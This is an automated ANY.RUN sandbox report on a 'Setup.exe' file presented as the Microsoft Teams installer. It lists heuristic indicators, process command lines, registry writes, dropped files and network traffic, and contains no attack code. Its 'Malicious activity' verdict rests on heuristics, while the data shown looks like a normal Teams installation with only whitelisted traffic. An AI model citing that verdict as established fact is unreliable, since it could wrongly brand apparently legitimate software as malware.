File name:

Setup.exe

Full analysis: https://app.any.run/tasks/fa1894ec-ef68-43fb-bf28-f4f45d930f2a
Verdict: Malicious activity
Analysis date: January 22, 2025, 01:38:05
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5:

974930CE3F894F494C573FB9E7EE0076

SHA1:

07819B738FAFF62A2724DFCF347860AAAC922A5C

SHA256:

FCC862DB236CCD85A0E8184C72449A657FE31BB90F2DBD650FFF158260622D7D

SSDEEP:

98304:Nrhz972Ytp74dEIRm1otdlqZhY40U+DgLhqO0KkMVqw/DhXtr2MiJK4uFAwN8sgj:yjlNjlj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • The DLL Hijacking

      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 6352)

    • Changes the autorun value in the registry

      • Teams.exe (PID: 2076)

    • Registers / Runs the DLL via REGSVR32.EXE

      • Update.exe (PID: 7080)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • MSTeamsSetup_c_l_.exe (PID: 7056)

    • Executable content was dropped or overwritten

      • Update.exe (PID: 7080)
      • Setup.exe (PID: 6504)
      • MSTeamsSetup_c_l_.exe (PID: 7056)

    • Reads security settings of Internet Explorer

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2076)

    • Starts a Microsoft application from unusual location

      • Setup.exe (PID: 6504)

    • The process drops C-runtime libraries

      • Update.exe (PID: 7080)

    • Checks Windows Trust Settings

      • Update.exe (PID: 7080)

    • Application launched itself

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • Creates/Modifies COM task schedule object

      • regsvr32.exe (PID: 244)
      • regsvr32.exe (PID: 6844)

    • Creates a software uninstall entry

      • Update.exe (PID: 7080)

    • Searches for installed software

      • Update.exe (PID: 7080)

  • INFO

    • The sample compiled with english language support

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)

    • Reads the computer name

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 7016)
      • Teams.exe (PID: 6352)
      • Teams.exe (PID: 6564)
      • Teams.exe (PID: 1512)
      • Teams.exe (PID: 2076)

    • Checks supported languages

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 7016)
      • Teams.exe (PID: 6352)
      • Teams.exe (PID: 6564)
      • Teams.exe (PID: 4824)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 3544)
      • Teams.exe (PID: 1512)
      • Teams.exe (PID: 2548)

    • Reads Microsoft Office registry keys

      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • Checks proxy server information

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)
      • Squirrel.exe (PID: 3288)

    • Disables trace logs

      • Update.exe (PID: 7080)
      • Update.exe (PID: 5544)
      • Squirrel.exe (PID: 3288)

    • Create files in a temporary directory

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • Reads the machine GUID from the registry

      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)

    • Reads the software policy settings

      • Update.exe (PID: 7080)
      • Update.exe (PID: 5544)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2076)

    • Creates files or folders in the user directory

      • Update.exe (PID: 7080)
      • Setup.exe (PID: 6504)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 6564)

    • Process checks computer location settings

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 4824)
      • Teams.exe (PID: 3544)
      • Teams.exe (PID: 2548)

    • Reads CPU info

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • Reads product name

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • Reads Environment values

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)

    • The process uses the downloaded file

      • Update.exe (PID: 7080)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:01:21 16:07:41+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.29
CodeSize: 2274304
InitializedDataSize: 27071488
UninitializedDataSize: -
EntryPoint: 0x21765c
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 1.7.0.3315
ProductVersionNumber: 1.7.0.3315
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
FileDescription: Microsoft Teams
FileVersion: 1.7.00.3315
InternalName: Setup.exe
LegalCopyright: Copyright (C) 2016 Microsoft. All rights reserved.
OriginalFileName: Setup.exe
ProductName: Microsoft Teams
ProductVersion: 1.7.00.3315
SquirrelAwareVersion: 1
CompanyName: Microsoft Corporation
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
18
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start setup.exe msteamssetup_c_l_.exe update.exe squirrel.exe teams.exe no specs update.exe teams.exe no specs teams.exe no specs teams.exe teams.exe no specs teams.exe teams.exe no specs teams.exe no specs teams.exe no specs teams.exe no specs regsvr32.exe no specs regsvr32.exe no specs regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
244 /s /n /i:user "C:\Users\admin\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.24151.2\x64\Microsoft.Teams.AddinLoader.dll"C:\Windows\System32\regsvr32.exeregsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1512"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --mojo-platform-channel-handle=3800 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeTeams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Teams
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
2076"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --squirrel-firstrunC:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
Update.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Teams
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\local\microsoft\teams\current\ffmpeg.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2464"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --squirrel-install 1.7.00.19353C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeUpdate.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Teams
Exit code:
0
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\uiautomationcore.dll
2548"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4768 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=accountSelectWindow /prefetch:1C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeTeams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Teams
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
3208"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1896,i,9580035878589261955,6433630308446160644,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeTeams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Teams
Exit code:
0
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
3288"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Squirrel.exe" --updateSelf=C:\Users\admin\AppData\Local\SquirrelTemp\Update.exeC:\Users\admin\AppData\Local\Microsoft\Teams\current\Squirrel.exe
Update.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Teams classic
Exit code:
0
Version:
3.3.13.0
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\squirrel.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
3544"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3156 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=notificationsManager /prefetch:1C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeTeams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Teams
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
4824"C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --first-renderer-process --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2520 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=loadingWindow /prefetch:1C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exeTeams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Teams
Version:
1.7.00.19353
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ws2_32.dll
5544C:\Users\admin\AppData\Local\Microsoft\Teams\Update.exe --createShortcut=Teams.exe -l=StartMenuC:\Users\admin\AppData\Local\Microsoft\Teams\Update.exe
Teams.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Teams classic
Exit code:
0
Version:
3.3.15.0
Modules
Images
c:\users\admin\appdata\local\microsoft\teams\update.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
Total events
15 560
Read events
14 889
Write events
652
Delete events
19

Modification events

(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7080) Update.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
347
Suspicious files
180
Text files
143
Unknown types
0

Dropped files

PID
Process
Filename
Type
7080Update.exeC:\Users\admin\AppData\Local\Microsoft\Teams\packages\Teams-1.7.00.19353-full.nupkg
MD5:
SHA256:
6504Setup.exeC:\Users\admin\AppData\Local\Downloads\MSTeamsSetup_c_l_.exeexecutable
MD5:CF0E0F57B68A11D099EC944200A6069D
SHA256:73354811E3109E265821124A18B1B7D9FD3DD1207BB46C18937D250C6AB46DEC
7056MSTeamsSetup_c_l_.exeC:\Users\admin\AppData\Local\SquirrelTemp\downloading.gifimage
MD5:3488A1749B859E969C01BA981036FAB6
SHA256:C3FA333FDBCE95D504AEE31912993DC17AB31324428F557AC774F7E98B049B99
7056MSTeamsSetup_c_l_.exeC:\Users\admin\AppData\Local\SquirrelTemp\background.gifimage
MD5:FF1F29DCA0451246C3CA6CB7B023434F
SHA256:753D7D351E427246E2B6CC86C45E21F952939E306C3EB2FDB1BD7D67842C64B8
7080Update.exeC:\Users\admin\AppData\Roaming\Microsoft\Teams\teams_install_session.jsonbinary
MD5:2CC9923247802851214D26C7B72D4A41
SHA256:FC42C5CDD0A8D651C3BDD3B7E01ED96DD2D5086CD92A1DFA6332B5DA2DA233B8
7056MSTeamsSetup_c_l_.exeC:\Users\admin\AppData\Local\SquirrelTemp\Update.exeexecutable
MD5:8F0E958D7EF57D727ADCDA1C67C24C2B
SHA256:4955CC6E58049EF1E274F340C8425CC55B324278199C92AC0DE87DF05BFAD35D
7080Update.exeC:\Users\admin\AppData\Local\SquirrelTemp\setup.jsonbinary
MD5:F57CCF6F5B9C1E2AAC3C144605B53AA5
SHA256:A92CCAA545B4AF7A81AC10C260291C3C33FB68197D150F8A42D1FBF74EB27648
7080Update.exeC:\Users\admin\AppData\Local\Microsoft\Teams\Update.exeexecutable
MD5:8F0E958D7EF57D727ADCDA1C67C24C2B
SHA256:4955CC6E58049EF1E274F340C8425CC55B324278199C92AC0DE87DF05BFAD35D
7080Update.exeC:\Users\admin\AppData\Local\Microsoft\Teams\setup.jsonbinary
MD5:F57CCF6F5B9C1E2AAC3C144605B53AA5
SHA256:A92CCAA545B4AF7A81AC10C260291C3C33FB68197D150F8A42D1FBF74EB27648
7056MSTeamsSetup_c_l_.exeC:\Users\admin\AppData\Local\SquirrelTemp\endpoint.jsonbinary
MD5:677CAB9A8B50AD026CFA7625A35DD2D7
SHA256:07890DDA20815E1E57DCA9553F5DFCFF1B85F4A4369685D4991599E2618978F0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
38
DNS requests
23
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3508
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3508
svchost.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1176
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2728
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2728
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
6456
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3508
svchost.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:137
whitelisted
3508
svchost.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
104.126.37.131:443
www.bing.com
Akamai International B.V.
DE
whitelisted
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
1076
svchost.exe
184.30.18.9:443
go.microsoft.com
AKAMAI-AS
DE
whitelisted
1176
svchost.exe
40.126.32.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.20
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
www.bing.com
  • 104.126.37.131
  • 104.126.37.139
whitelisted
google.com
  • 142.250.185.238
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
login.live.com
  • 40.126.32.68
  • 20.190.160.22
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.136
  • 40.126.32.133
  • 40.126.32.72
  • 20.190.160.20
whitelisted
teams.live.com
  • 52.113.194.132
whitelisted
statics.teams.cdn.office.net
  • 23.48.23.22
  • 23.48.23.9
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted

Threats

No threats detected
Process
Message
Update.exe
TelemetryManagerImpl creation started
Update.exe
Update.exe Information: 0 :
Update.exe
Starting TelemetryManager constructor
Update.exe
Update.exe Information: 0 :
Update.exe
Update.exe Information: 0 :
Update.exe
Performance counters are disabled. Skipping creation of counters category.
Update.exe
Update.exe Information: 0 :
Update.exe
RecordBatcherTask with ID 4 started.
Update.exe
Update.exe Information: 0 :
Update.exe
DataPackageSender with UserAgent name: AST-exe-C#, version: 3.3.15.0, [Ast_Default_Source]
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Setup.exe